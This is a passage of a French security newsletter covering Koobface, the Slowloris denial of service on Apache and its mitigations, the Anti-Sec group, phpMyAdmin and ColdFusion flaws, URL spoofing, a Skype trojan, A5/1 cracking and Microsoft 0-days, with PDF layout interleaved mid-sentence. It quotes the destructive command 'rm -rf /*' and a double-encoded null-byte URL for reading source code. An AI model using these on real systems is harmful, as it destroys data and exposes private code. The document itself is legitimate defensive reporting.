strictement interdite. !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!![26]
KOOBFACE, LA MALWARE QUI CHERCHAIT DES AMIS LACTU SCU N23

Le serveur DNS malveillant peut galement renvoyer Le module installeur de faux-antivirus va se


lutilisateur vers des sites malveillants. Par exemple, si connecter au serveur de contrle de Koobface. Ce
lutilisateur dsire se connecter au site de sa banque, il dernier va alors lui indiquer une URL partir de laquelle
est tout fait possible que le serveur DNS malveillant le le module va tlcharger, puis installer un faux antivirus
redirige vers un site usurpant lidentit du site de la (rogue antivirus).
banque (site de phishing). Lutilisateur ne pourra se
rendre compte de rien, tant donn que ladresse Ce composant a galement la possibilit douvrir des
prsente dans la barre dURL correspondra bien popup et des faux avertissements de scurit
ladresse quil a tape... communment employs par les faux antivirus.

Finalement, qui peut-on faire confiance ? d'entreprises en possdent un en interne. Partager des
WWW.XMCOPARTNERS.COM
informations est donc devenu chose courante sur les
Comme nous lavons vu prcdemment, Koobface se rseaux sociaux. De plus, les utilisateurs sont habitus
propage laide des rseaux sociaux. Cette tre redirigs vers des sites extrieurs lorsquils
propagation est facilite par les plates-formes cliquent sur les liens.
communautaires, car sur celles-ci, les utilisateurs sont Les utilisateurs les plus viss pour le moment sont les
en relation avec des personnes que quils connaissent anglophones, les messages diffuss par Koobface
majoritairement. Koobface profite ainsi de la tant en anglais. Nanmoins, il est possible que dans
confiance induite pour convaincre plus facilement les un futur proche, les messages soient diffuss dans la
utilisateurs de cliquer sur un lien malveillant. langue de lutilisateur, comme les spams qui sont de
plus en plus cibls (http://blogs.zdnet.com/security/?
Autre fait important, il est noter que les rseaux p=3813).
sociaux tels que Facebook sont devenus des moyens
de communication quasiment aussi utiliss que lemail, Grce sa modularit et sa capacit de mise jour,
ou la messagerie instantane. De plus en plus Koobface na pas fini de faire parler de lui.

Ce document est la proprit du cabinet XMCO Partners. Toute reproduction est


strictement interdite. !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!![27]
KOOBFACE, LE MALWARE QUI CHERCHAIT DES AMIS LACTU SCU N23

Webographie

http://blog.trendmicro.com/the-real-face-of-koobface/

http://www.kaspersky.com/news?id=207575670

http://mad.internetpol.fr/archives/archives/45-
Koobface-La-confiance-accordee-a-vos-relations-doit-
cesser..html

http://blog.fireeye.com/research/2009/06/killing-the-
beastpart-ii.html

http://status.twitter.com/post/138789881/koobface-
malware-attack

http://news.cnet.com/8301-1009_3-10210376-83.html
http://blog.trendmicro.com/new-koobface-upgrade-
makes-it-takedown-proof/

http://blog.trendmicro.com/koobface-ramps-up-its-
twitter-campaign/

WWW.XMCOPARTNERS.COM

Ce document est la proprit du cabinet XMCO Partners. Toute reproduction est


strictement interdite. !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!![28]
LACTU SCU N23

Slowloris ou lattaque de dni de

LES SERVEURS APACHE ET service applicative...

LATTAQUE SLOWLORIS...
Depuis plusieurs annes Apache
est connu pour tre vulnrable
des attaques par dni de
service [voir webographie] mais
personne navait encore publi
une preuve de concept
fonctionnelle.

Rcemment, Robert Hansen, plus


connu sous le pseudonyme de
Rsnake, a publi un script
exploitant cette vulnrabilit
dornavant appele SlowLoris.

En quelques secondes et avec


une faible bande passante, il
est possible de provoquer
larrt temporaire dun serveur
web Apache.

Retour sur cette faille, le


script en question et les
options dApache.

Pierre NOGUES
XMCO | Partners

Fonctionnement dApache Lintrt d'une telle attaque rside dans le fait qu'une
bande passante trs faible est suffisante pour mettre
hors service un serveur Apache disposant de beaucoup
Le coeur du fonctionnement d'Apache repose sur de ressources.
l'attribution d'un thread ou d'un processus par client A titre dexemple, il est possible de mettre hors service
connect (cela dpend de la configuration du serveur). un serveur Apache muni d'une connexion 100 Mo/s
Comme les ressources du serveur ne sont pas partir d'un simple accs ADSL.
illimites, le fichier de configuration d'Apache indique
une directive "MaxClients" qui reprsente le nombre
maximum de connexions simultanes sur le serveur.
Lintrt d'une telle attaque rside dans
le fait qu'une bande passante trs faible est
Un type d'attaque par dni de service consiste saturer suffisante pour mettre hors service un serveur
WWW.XMCOPARTNERS.COM
ce nombre de connexions maximums disponibles sur le Apache disposant de beaucoup de
serveur en ouvrant simultanment plusieurs sockets.
Une fois le nombre maximum de processus ou threads
ressources...
crs atteints, Apache mettra en attente les nouvelles
connexions et ne les servira pas avant qu'une Il ne s'agit aucunement d'une attaque rseau de type
ressource ne se libre. SynFlood, mais bien d'une attaque au niveau applicatif.
Apache clame que cette dernire n'est pas propre
Ce type de dni de service ne met hors service que le l'implmentation de son serveur, mais qu'elle est due
service Apache (HTTP/HTTPS) temporairement et un problme de plus bas niveau, situe sur la couche
n'affecte pas le systme sous-jacent. Ds que l'attaque rseau. Cependant, si cette affirmation tait vraie,
est stoppe, le serveur Apache rpondra de nouveau comment Apache pourrait expliquer que le serveur
aux requtes effectues par les clients. Microsoft IIS ne soit pas vulnrable ce type
d'attaque ?

Ce document est la proprit du cabinet XMCO Partners. Toute reproduction est


strictement interdite. !!!!!!!!!!!!!!!!! [29]
LES SERVEURS APACHE ET LATTAQUE SLOWLORIS LACTU SCU N23

Le script Slowloris dvelopp par Rsnake

Afin de mieux comprendre le fonctionnement de ce type


d'attaque, tudions le script SlowLoris de Rsnake [1].

Celui-ci cr simultanment de nombreuses sockets


puis se connecte au serveur. Il envoie un dbut de
requte HTTP sur chaque socket. Ensuite, le script va
envoyer intervalle rgulier une entte HTTP
supplmentaire de faible taille sur chaque connexion.
Le fait de ne pas terminer la requte HTTP va maintenir
active la connexion avec le serveur, consommant ainsi
les ressources de ce dernier.

Existe-t-il une solution pour se protger contre ce


type dattaque ?

Les directives dApache sont inefficaces

Il faut savoir que toutes les directives de configuration


par dfaut d'Apache [http://httpd.apache.org/docs/trunk/
misc/security_tips.html#dos] sont inefficaces face
cette attaque : elles ne feront que retarder cette
L'intervalle de temps d'attente entre l'envoi de chaque dernire, ou pire, rendre moins performant le serveur
entte est un lment crucial de l'attaque. En effet, plus en question.
on attendra longtemps, moins denvois paquets seront
ncessaires pour maintenir une connexion active. La - Rgler la valeur du "TimeOut" est une bonne chose,
consommation de bande passante sera alors moins mais malheureusement inefficace face ce type
importante et il sera plus facile d'effectuer cette attaque d'attaque. Baisser sa valeur 10 voire 5 secondes
partir d'une petite connexion. demanderait une bande passante plus importante de la
part du client. Il devra donc envoyer des paquets une
plus grande frquence. Cependant, mme avec ces
rglages, le script SlowLoris sera toujours efficace. De
surcrot, ce dernier n'est pas du tout optimis : il est
possible de raliser la mme attaque en consommant
WWW.XMCOPARTNERS.COM

10 fois moins de bande passante. Par exemple, on


pourrait raliser un script qui envoie une requte
HTTP caractre par caractre trs lentement afin de
maintenir la connexion active.

Ce temps d'attente maximum est dfini par la directive


"TimeOut" du fichier de configuration d'Apache. Si le - La fonctionnalit "KeepAlive" permet d'effectuer
serveur ne reoit aucune donne de la part du client plusieurs requtes HTTP sur la mme connexion TCP.
pendant cette dure, alors la connexion sera coupe et Cela vite au serveur d'avoir grer trop de nouvelles
le thread associ libr. Par dfaut, le "TimeOut" est connexions TCP et lui permet donc d'conomiser ses
dfini 300 secondes (5 minutes), ce qui explique ressources.
pourquoi l'attaque est trs efficace, mme avec une trs
petite bande passante.

Ce document est la proprit du cabinet XMCO Partners. Toute reproduction est


strictement interdite. !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!![30]
LES SERVEURS APACHE ET LATTAQUE SLOWLORIS LACTU SCU N23

Or le script SlowLoris n'exploite pas du tout les Limiter ou bloquer les adresses IP source
fonctionnalits KeepAlive d'Apache. Dsactiver cette
fonctionnalit sera donc inutile et pourrait avoir des Une premire solution efficace consiste utiliser un
consquences nfastes sur l'utilisation nominale du module qui limite le nombre de connexions simultanes
serveur. par IP source. Malheureusement, il peut tre impossible
de mettre en place cette solution sur un serveur
recevant de nombreuses connexions d'une mme IP.
Il faut savoir que toutes les directives de
En particulier sur ceux qui reoivent de nombreuses
configuration dApache sont inefficaces connexions via des proxies.
face cette attaque...
On pourrait galement analyser les logs la recherche
d'erreur du type "Request failed: error reading the
- Augmenter la valeur du champ "MaxClients" est headers" puis bloquer les adresses IP via un pare-feu.
inutile, l'attaquant pourra gnralement crer un Le problme provient du fait que ce message d'erreur
nombre de connexions qui sera toujours suprieur est gnr quelques minutes aprs le dbut de
cette valeur. De plus, un MaxClients trop lev peut l'attaque. De plus, un pirate pourra toujours contourner
provoquer des problmes de stabilit trs importants, cette gnration de logs en terminant ses requtes
en particulier pour les applications web utilisant des correctement.
scripts PHP ou CGI gourmand en RAM ou en CPU.

- Les autres directives telles que "LimitRequestBody", Utilisation dun reverse-proxy


"LimitRequestFields", "LimitRequestLine" ne sont
que des contournements. Certaines d'entre elles Enfin, on pourrait mettre en place un reverse-proxy ou
pourront bloquer le script SlowLoris, mais il sera un rpartiteur de charge en amont du serveur afin de lui
toujours possible de l'adapter afin de contourner ces attribuer la gestion de ces requtes malicieuses. Il faut
mesures de scurit. tout de mme faire attention choisir un serveur qui
n'est pas vulnrable cette attaque.

Voici la liste des serveurs affects selon l'auteur de


SlowLoris :

Serveurs affects :
! Apache 1.x
! Apache 2.x
! Dhttpd
!GoAhead WebServer
!Squid (non vrifi)
!WebSense "block pages" (non vrifi)
!Trapeze Wireless Web Portal (non vrifi)
!Verizon's MI424-WR FIOS Cable modem
$$$$$$$$$$$$$$$(non vrifi)
!BeeWare WAF (non vrifi)
WWW.XMCOPARTNERS.COM

!Deny All WAF (non vrifi)

Serveurs non affects :


IIS 6.0
IIS 7.0
Lighttpd
Nginx
Cherokee
Netscaler
Cisco CSS
Microsoft ISA proxy

Ce document est la proprit du cabinet XMCO Partners. Toute reproduction est


strictement interdite. !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!![31]
LES SERVEURS APACHE ET LATTAQUE SLOWLORIS LACTU SCU N23

Conclusion Webographie

Slowloris est une attaque qui peut avoir des Prsentation de la vulnrabilit par Rsnake :
consquences importantes sur les serveurs http://ha.ckers.org/blog/20090617/slowloris-http-dos/]
Apache. Des pirates ont profit du script dj publi
pour faire quelques dgts. Faille Apache expose sur Security Focus
http://www.securityfocus.com/archive/1/456339/30/0/
Rcemment un script Python baptis "Pyloris" a threaded
permis d'utiliser un proxy SOCKS et par
consquent un rseau d'anonymisation pour mener Apache Security
l'attaque ! http://www.amazon.fr/Apache-Security-Ivan-Ristic/dp/
0596007248
Esprons quune solution efficace soit rapidement
mise en oeuvre pour viter que des virus et botnets
nutilisent prochainement cette attaque (si ce nest
pas dj fait...).

Slowloris constitue un avertissement : il prouve


l'efficacit des DoS sur les couches hautes. De
nombreuses attaques possibles navaient jusquici
jamais t exploites, comme la saturation de la
base de donnes sous-jacente avec des recherches
coteuses ou la saturation des web-services XML.

INFO
La vulnrablit dj connue depuis quelques annes....

Le livre Apache Security crit par Iva Ristic en 2005 parlait dj de


cette faille.

WWW.XMCOPARTNERS.COM

Ce document est la proprit du cabinet XMCO Partners. Toute reproduction est


strictement interdite. !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!![32]
L'ACTU SCU N23

Lactualit du mois...
Les chercheurs de vulnrabilit ont
t actifs ces deux derniers mois.
En effet, on compte un grand nombre
de failles "0-day" ainsi que des

LACTUALIT DU MOIS vulnrabilits


surprenantes
autres.
les
toujours
unes que
plus
les

Du ct des nouveauts et de
lactualit, quelques recherches
sur le cassage GSM, le groupe Anti-
Sec ou encore sur les trojan Skype
nous ont particulirement
intresss.

Petit tour dhorizon des


vulnrabilits et de lactualit
scurit de ces derniers mois
prsent par les consultants XMCO.

Adrien GUINAULT
Nicolas KERSHENBAUM
Lin MIANG JIN
Yannick HAMON
XMCO | Partners

PHPMyAdmin, Windows, ColdFusion, Firefox, Safari ont tous t affects par une vulnrabilit 0-day. Les
pirates seraient-ils plus actifs pendant l't ? La crise a-t-elle touche les chercheurs et hackers au point de ne
plus prendre de vacances ?

Revenons en dtails sur l'actualit et sur les vulnrabilits les plus marquantes :

Anti-Sec et le 0-day OpenSSH : prsentatiion du Buzz ralis autour de ce groupe de hacker.

PHPMyAdmin: une nouvelle vulnrabilit qui permet d'injecter des commandes de manire non authentifie
sur une application PHPMyAdmin installe par dfaut

Les failles Microsoft des deux derniers mois : 0-day et correctifs de scurit.
WWW.XMCOPARTNERS.COM

Spoofing d'URL sur Firefox/Safari : une bonne attaque pour les Phishers !

Attaque sur le protocole GSM A5/1 : l'utilisation de Rainbow tables pour casser le protocole A5/1.

Le cheval de Troie pour Skype

Ce document est la proprit du cabinet XMCO Partners. Toute reproduction est


strictement interdite. !!!!!!!!!!!!!!!!! [33]
L'ACTU SCU N23

... et 0 day
Antisec... OpenSSH

Tous les veilleurs en scurit ont certainement entendu Les moyens d'Anti-Sec, P0wn en srie...
parler du mouvement Anti-Sec qui s'est rcemment fait
remarquer en attaquant plusieurs sites web du Pour se faire entendre, le mouvement sen est pris
monde de la scurit. plusieurs sites au cours des dernires semaines.

Contrairement ce que lon pourrait croire, ce Parmi ces sites figure Astalavista.com, un site li la
mouvement Anti-Sec nest pas n dhier. Il existe scurit informatique. Pour la petite histoire, Anti-Sec
depuis plusieurs annes. Ds le dbut des annes accusait les administrateurs de ce site d'tre des
2000, plusieurs groupes hacktivistes comme ~el8 et personnes incomptentes, et voulait donc tester les
leur pr0j3kt m4yh3m avaient dj fait parler deux. relles capacits de l'quipe de scurit. Anti-Sec
Voici une prsentation de ce groupe qui dclare sest introduit alors sur le serveur dun des
ouvertement la guerre l'industrie de la scurit administrateurs du site : Glafkos Charalambous,
informatique ! connu sous le pseudonyme nowayout. Lors de leur
intrusion, ils dcouvrent de nombreuses informations,
notamment le mot de passe du compte Gmail de
Anti-Sec, qui sont-ils et que veulent-ils ? nowayout. Cet vnement inattendu a eu des
consquences nfastes pour le serveur de la victime.
Anti-Sec reprsente un mouvement de hackers Le mouvement a dcouvert dans un mail que Glafkos
dont lidologie va lencontre de celle des hackers les traitaient de scripts kiddies (Anti-Sec stait
traditionnels. Il nest pas possible de connatre attaqu Astalavista quelques semaines plus tt), et
prcisment leur nombre, ni leur structure interne. ceci a dclench leur colre. Anti-Sec a donc effac
Toutefois, beaucoup de personnes pensent que le lensemble du contenu du serveur ainsi que les
mouvement nest pas ou peu organis, et quil ne sauvegardes correspondantes (rm -rf /* &). Pour plus
regroupe quun faible nombre dindividus. de dtails, tux-planete.fr [2] fournit une analyse assez
intressante de lattaque.
Les revendications du mouvement Anti-Sec sont assez
simples. Ils rclament la fin de la politique du Full-
Disclosure, qui ne serait utile, selon eux, qu aider les
scripts kiddies et les pirates en herbe. En effet, on
pourrait traduire le Full-Disclosure comme la divulgation
des vulnrabilits et des dtails techniques utiles
lexploitation de celles-ci. On peut citer en exemple la
mise disposition publique dexploits cls en main sur
des sites comme milw0rm.com.

Anti-Sec accuse galement lindustrie de la scurit


informatique de profiter du Full-Disclosure pour jouer
sur le march de la peur. Plus il y a dexploits
disposition, plus les scripts kiddies et les crackers ont
WWW.XMCOPARTNERS.COM

doutils pour attaquer des cibles vulnrables, plus il y a


dentreprises victimes, et plus les entreprises veulent
acheter des produits (firewall, IDS, DLP...) et des
prestations de scurit (audit). CQFD, mais un peu
tordu quand mme.

$Le but dAnti-Sec est donc de dtruire toutes les


communauts et toutes les entreprises qui
soutiendraient le Full-Disclosure. Les cibles principales
tant le site de diffusion dexploit milw0rm.com et les
forums hackforums.net. travers cette srie de
destructions, Anti-Sec espre forcer lindustrie de la
scurit se rformer, rien que a !

Ce document est la proprit du cabinet XMCO Partners. Toute reproduction est


strictement interdite. !!!!!!!!!!!!!!!!! [34]
ACTUALIT DU MOIS : 0 DAY ET ANTI-SEC L'ACTU SCU N23

Plus rcemment et de manire encore plus visible, Anti- Le mouvement avait annonc quil dvoilerait la faille
Sec a attaqu le clbre site d'hbergement d'images sur la liste de diffusion Full Disclosure.
imageshack.com. Le groupe a ainsi remplac la
majorit des images hberges sur imageshack.com Cependant, il sest avr que lannonce navait pas t
par leur manifeste. faite par un membre dAnti-Sec ayant ralis lune des
attaques. Aucun dtail na t concrtement rvl.

Ceci amne beaucoup de gens penser que ce soi-


disant Zro-day est en fait un hoax. Les logs exposs
par le mouvement serviraient en fait cacher des
erreurs de ladministrateur systme. La mthode
employe par Anti-Sec correspondrait plutt une
attaque de type Brute-force. Mme si cette faille
relve pour linstant plus de la rumeur que du fait
confirm, il est toujours prudent de garder son systme
jour et de surveiller ses logs de connexions.

Et la suite ?

La croisade dAnti-Sec contre le Full Disclosure est loin


dtre termine. Pour ceux qui dsireraient suivre
lvolution des vnements, la liste de diffusion Full
Disclosure est un bon moyen de se tenir inform, si on
arrive faire le tri des informations [8]. Mais comme le
fait remarquer Nicolas Ruff sur son blog [7], de telles
initiatives refont surfaces de manire priodique depuis
Dernirement, Anti-Sec sest attaqu Blackhat- longtemps. Le mouvement risque de ne pas disparatre
forums, un site dont le but est de diffuser le plus de si tt.
dexploits et de techniques de piratage possible.

Zro day SSH... ou pas! Webographie


Anti-Sec prtend avoir commis ses rcentes attaques
[1] http://www.h-online.com/security/Hacker-group-
laide dun Zro-day sur OpenSSH quils auraient
declares-war-on-the-security-industry--/news/113758
dcouvert. En attendant, cette dclaration nest pas
vrifiable, et aucune preuve tangible na t avance [2] http://www.tux-planet.fr/astalavista-pwnage-expose-
par le mouvement. Seuls quelques pseudo-logs qui by-anti-sec-group/
seraient issus des attaques ont t dvoils par Anti-
Sec. Ces derniers montrent un outil fait maison nomm [3] http://www.secuobs.com/revue/news/106469.shtml
0pen0wn, ou encore openPWN, qui exploiterait le
WWW.XMCOPARTNERS.COM
Zro-day en question. [4] http://isc.sans.org/diary.html?storyid=6742

[5] http://isc.sans.org/diary.html?storyid=6760

[ 6 ] h t t p : / / w w w. t h e r e g i s t e r. c o . u k / 2 0 0 9 / 0 7 / 2 0 /
anti_sec_spoof/

[7] http://news0ft.blogspot.com/2009/07/la-preuve-que-
la-securite-est-un-echec.html

[8] http://seclists.org/

Ce document est la proprit du cabinet XMCO Partners. Toute reproduction est


strictement interdite. !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!![35]
L'ACTU SCU N23

PHPMyAdmin

Le principe Quelques jours plus tard, dautres exploits ont vu le


jour. Le dernier en date est un peu plus violent puisquil
Et bien cela faisait longtemps quun exploit permet de rechercher via des Google dorks des cibles
PHPMyAdmin non authentifi navait pas t publi ;) potentielles et tente ensuite dexploiter les versions
Cette application web implmente par de nombreux vulnrables.
dveloppeurs PHP/MySQL est trs largement utilise
sur Internet ou sur les rseaux dentreprise.

La vulnrabilit en question a t publie en mars 2009


et affecte les versions infrieures 2.11.9.5 et 3.1.3.1.
La vulnrabilit provient d'une erreur du script utilis
pour gnrer le fichier de configuration. En envoyant
une requte POST, il serait possible dinjecter un code
PHP malicieux au sein du fichier de configuration
config.inc.php, par dfaut situ au sein du rpertoire /
phpmadmin/config/.

Ainsi, en insrant le code dune backdoor PHP, le


pirate pourrait passer des commandes sur le systme
avec les privilges de lutilisateur ayant dmarr le
service web.

La premire preuve de concept fonctionnelle a t


publie sur le site de PDP (Gnucitizen le 9 juin [1]). La
capture suivante illustre lexploitation de cette
vulnrabilit.

Note: Si la page de configuration n'est plus accessible


aprs l'installation de l'application, la faille de scurit
n'est pas exploitable.

Notre conseil : utilisez au plus vite la dernire version


3.1.3.2 de lapplication PHPMyAdminou supprimez le
rpertoire /config/. WWW.XMCOPARTNERS.COM

Versions vulnrables

* PHPMyAdmin 2.11.x avant version 2.11.9.5


* PHPMyAdmin 3.x avant version 3.1.3.1

Webographie

[1] http://www.gnucitizen.org/blog/cve-2009-1151-
phpmyadmin-remote-code-execution-proof-of-concept/

Ce document est la proprit du cabinet XMCO Partners. Toute reproduction est


strictement interdite. !!!!!!!!!!!!!!!!! [36]
L'ACTU SCU N23

ColdFusion et le NULL Byte..

La faille en question Cette vulnrabilit est similaire celle publie en


2006 (CVE-2006-5858) pour ColdFusion MX 7 sur
Les failles de NULL Byte ont connu leurs apoges un serveur IIS.
entre 2003 et 2005. Depuis, tout le monde pensait A priori, cette faille nest pas exploitable sur les
que cette attaque, qui consiste rajouter un installations Apache.
caractre NULL pour accder au code source d'une
page web, tait rsolue sur tous les serveurs web du Versions vulnrables
march.
* Adobe ColdFusion infrieure 8.0.1
Hlas, Macromedia (Adobe) ColdFusion a
rcemment prouv le contraire.
Une vulnrabilit de ce type a t dcouverte au sein Rfrence :
du serveur applicatif ColdFusion. Cette dernire est
lie la cohabitation entre IIS et le moteur JRun de http://cve.mitre.org/cgi-bin/cvename.cgi?
Coldfusion qui ne dcode pas de la mme faon le name=CVE-2009-1876
NULL Byte et se font ainsi concurrence.

En effet, le double encodage d'un caractre NULL

INFO
insr aprs l'extension d'un fichier non interprt par
ColdFusion (diffrent de l'extension .CFM) permettait
un pirate d'obtenir le code source du fichier en
question. Prs de 80% des internautes utiliseraient une
version d'Adobe Flash/Acrobat Reader
Le caractre NULL correspond la chane %00
lorsqu'il est URL encod. En encodant une nouvelle
vulnrable...
fois %00 on obtient : Restons chez notre ami Adobe.

-% encod correspond la valeur %25. D'aprs l'tude "Flash Security Hole


-00 ne s'encode pas. Advisory" mene par Trusteer sur la
technologie Flash, prs de 80% des
-la chane %00 encode donne alors %2500.
internautes utiliseraient une version
vulnrable d'Adobe Flash. En ce qui
En connaissant un nom de fichier non interprt par concerne la visionneuse PDF Acrobat
ColfFusion, le pirate peut donc visualiser le code Reader, 84% des utilisateurs qui seraient
source en saisissant l'URL du type : concerns.
Alors que la technologie d'Adobe, Flash,
connait un taux de pntration de 99%
http://<adresse-site-web>/index.php%2500.cfm chez les internautes, seulement 20%
d'entre eux utilisent une version jour
du programme. D'aprs les chercheurs qui
WWW.XMCOPARTNERS.COM

ont men l'tude, ce serait le plus gros


problme de scurit sur Internet
l'heure actuelle. En effet, en
comparaison, la part de march d'Internet
Explorer est de 65%, et celui de Firefox
de 30%. Le taux d'utilisateurs ayant une
version vulnrable d'un des logiciels
d'Adobe est donc suprieur la part de
march du navigateur web le plus
utilis... Il n'est donc pas tonnant que
de plus en plus de cybercriminels se
concentrent aujourd'hui sur Flash et sur
Acrobat Reader.

Ce document est la proprit du cabinet XMCO Partners. Toute reproduction est


strictement interdite. !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!![37]
L'ACTU SCU N23

Spoofing d'URL

Description

Une vulnrabilit a t dcouverte fin Juillet au sein


des navigateurs Firefox et Safari (une vulnrabilit
similaire a t galement dcouvert sur Internet
Affichage d'une page web contrefaite avec l'URL
Explorer au mois d'aot - voir rfrences).
www.google.fr
Cette faille de scurit, baptise URL spoofing,
permet dafficher une adresse Internet dans la barre
dURL diffrente de celle o est charge la page.
Cette dernire rsulte d'une mauvaise gestion des Versions vulnrables
URLs par le navigateur lors de l'ouverture d'une
nouvelle fentre. * Firefox 3.0.12
* Firefox 3.5.1
La fonction JavaScript "window.open()" permet de * Safari 4.0.1
raliser cette malversation en chargeant le nom de
domaine contenant des caractres "%20"
reprsentant des espaces, et "," ou "%" la fin du Rfrences :
domaine spoof.
Vulnrabilit Firefox/Safari :
http://es.geocities.com/jplopezy/firefoxspoofing.html
Le code d'exploitation
Vulnrabilit Internet Explorer :
Le code prsent permettait partir de nimporte quel http://lostmon.blogspot.com/2009/08/multiple-browsers-
domaine, dafficher une fentre de type popup avec le fake-url-folder-file.html
contenu de son choix et lURL http://www.google.com.

WWW.XMCOPARTNERS.COM

Ce document est la proprit du cabinet XMCO Partners. Toute reproduction est


strictement interdite. !!!!!!!!!!!!!!!!! [38]
L'ACTU SCU N23

Un trojan permet d'espionner les utilisateurs de Skype

Lhistorique avant que celles-ci ne soient chiffres, et celles reues


aprs qu'elles soient dchiffres par Skype.
Ruben Unteregger, un chercheur en scurit
informatique, vient de mettre disposition le code Certains logiciels quivalents existaient dj mais
source de son cheval de Troie, ciblant le logiciel de taient trs chers (trojan bavarian) [2].
conversation Skype, utilis principalement pour
effectuer des communications sur Internet via la
voix sur IP (VoIP). Skype utilise un protocole
robuste pour chiffrer les communication entre
deux clients. La scurit de ce logiciel a t
teste, plusieurs reprises, mais jamais
casse.

Face au refus de Skype de fournir un moyen de


contrle pour les autorits (en gros intgrer une
backdoor au sein du logiciel), de nombreux
tats avaient pens dvelopper un logiciel
permettant de rcuprer les conversations
directement sur lordinateur sur coute. La BKA
dclarait dailleurs fin 2007 quelle envisageait
de surveiller la source des tlcommunications
- c'est--dire aller la source avant le
chiffrement ou aprs son dchiffrement.
En fvrier 2009, une entreprise avait annonc
lors dune confrence Londres, que la NSA
tait prte rcompenser de plusieurs milliards
de dollars celui qui arriverait casser le
chiffrement utilis par Skype, et ce autant pour
les messages changs par crit que par oral.

Ce logiciel reste un rel problme pour les


diffrentes entits qui surveillent les citoyens. Grce la mise disposition du code source en
licence GPL, les gouvernements pourront utiliser leur
propre programme de surveillance et "mettre en
Le principe coute" certains utilisateurs moindre cot.

Face cette forte demande, un chercheur a dvelopp


u n m a l w a r e b a p t i s " Tr o j a n . P e s k y s p y " o u Webographie
WWW.XMCOPARTNERS.COM

"TROJ_SPAYKE.C". Ce dernier permet de contourner


le chiffrement utilis lors des appels, afin de pouvoir [1] http://www.megapanzer.com/2009/08/04/watching-
enregistrer les conversations au format MP3 une fois encrypted-skype-traffic-with-skypedllinjector/
install sur un poste cible. Ce fichier audio peut ensuite
tre envoy sur le serveur du pirate, susceptible [2] http://wikileaks.org/wiki/Bavarian_trojan_for_non-
dcouter les conversations espionnes en temps voulu. germans

Lorsque le cheval de Troie est excut au sein d'un


systme, il s'injecte au sein du processus Skype
dans le but de hooker certaines fonctions. Le malware
peut ainsi intercepter l'ensemble des donnes audio
PCM entre le micro de l'utilisateur et le logiciel Skype. Il
peut ainsi rcuprer les donnes audio envoyes

Ce document est la proprit du cabinet XMCO Partners. Toute reproduction est


strictement interdite. !!!!!!!!!!!!!!!!! [39]
L'ACTU SCU N23

Attaque sur l'algorithme A5/1

Un projet permettrait de casser beaucoup plus dune protection identique celle implmente sur la
rapidement le chiffrement A5/1 utilis pour les 3G. Les constructeurs, oprateurs et utilisateurs
communications GSM. seraient alors sensibiliss au risque rel de cette
technologie.
Une nouvelle attaque concernant le dchiffrement des
A noter qu'un sniffer (logiciel d'coute) dnomm
communications GSM fait parler d'elle. Lors de la
GSM AirProbe permet de raliser une capture et une
confrence "Hacking at Random", le chercheur
analyse du trafic GSM. Ce logiciel a t prsent lors
Karsten Nohl a prsent un projet open-source
d'une seconde confrence.
permettant de casser facilement l'algorithme de
chiffrement A5/1 utilis pour les communications GSM
(2G). En France encore 45 millions de personnes

INFO
utilisent cette technologie soit prs de 78%.

La mthode propose par le chercheur repose sur


une attaque de brute-force (test de toutes les cls Twitter utilis comme centre de commande
possibles) en utilisant le calcul distribu. Une fois la
pour botnet
cl dcouverte, il serait alors possible de dchiffrer
l'ensemble des conversations tlphoniques ralises
partir et en provenance du tlphone cibl ainsi que Aprs les rcentes attaques DDos subies
les SMS envoys et reus. par Twitter au dbut du mois d'aot, le
site de micro-blogging est une nouvelle
Cet algorithme, utilis depuis prs de 15 ans, a dj fois sous les feux de la rampe. Cette
fois, d'aprs Jose Nazario chercheur en
t vis par plusieurs attaques. Lors de sa
scurit chez Arbor Network, Twitter
confrence, le chercheur n'a pas prsent une permettrait des pirates de contrler
nouvelle vulnrabilit, mais plutt une nouvelle leur botnet. Pour mmoire, un botnet est
mthode acclrant grandement le temps ncessaire un rseau de machines contrles
au cassage de cet algorithme. Il existait aujourd'hui au l'insu de leur propritaire, par un ou
moins quatre solutions commercialises entre 100 plusieurs pirates.
000$ et 250 000$ permettant de casser la cl de
chiffrement. Cependant, ces logiciels ne pouvaient, vu Jose Nazario a dcouvert un compte
leur prix, tre utiliss par le grand public. Twitter plutt trange nomm
"upd4t3" (signifiant "update", ou "mise
Karsten Nohl souhaite donc rendre l'exploitation de jour" en franais). En effet, les
messages posts par ce compte semblaient
cette attaque accessible tous. Pour cela, il dsire
incomprhensibles pour un humain. En
gnrer des "rainbow tables", permettant de faire la ralit, ces derniers taient encods en
corrlation entre une squence chiffre et la cl base 64, et correspondaient des liens
correspondante. Le chercheur estime que le temps que la machine infecte devait
ncessaire la gnration de cette table sera de 3 contacter. Ces liens contenaient des
WWW.XMCOPARTNERS.COM

mois en utilisant la puissance de calcul de 80 commandes ou des excutables


ordinateurs. Ces tables pourront ensuite tre tlcharger. Les machines zombies
tlcharges et utilises par l'ensemble des suivaient donc ce compte grce au flux
utilisateurs. RSS, et taient ainsi contrles par le
ou les pirates.
Son projet consiste donc partager les ressources de Le compte "uptd4t3" a aujourd'hui t
dsactiv par Twitter, et leur quipe de
calcul pour gnrer cette table le plus rapidement
scurit serait en train de l'analyser.
possible. Chaque utilisateur pourrait ainsi contribuer Par ailleurs, Jose Nazario aurait trouv
sa cration. au moins deux autres comptes qui
seraient utiliss de manire similaire.
Par ce projet, le chercheur espre amliorer la
scurit relative la 2G pour que celle-ci bnficie

Ce document est la proprit du cabinet XMCO Partners. Toute reproduction est


strictement interdite. !!!!!!!!!!!!!!!!! [40]
L'ACTU SCU N23

Microsoft, 0-day et
patch de scurit

Microsoft a subi les foudres des pirates durant les mois L'exploit a t ajout au framework Metasploit et est
de Juillet et dAot. Plusieurs vulnrabilit "0-day" ont fonctionnel sur les versions anglaises. XMCO a
t publis. Ces dernires affectaient des logiciels dvelopp la version franaise qui sera disponible ds
varis : DirectShow, Microsoft Office Web ou encore le que Microsoft aura publie le correctif.
serveur IIS/FTP.
Enfin la dernire vulnrabilit affecte le protocole SMB
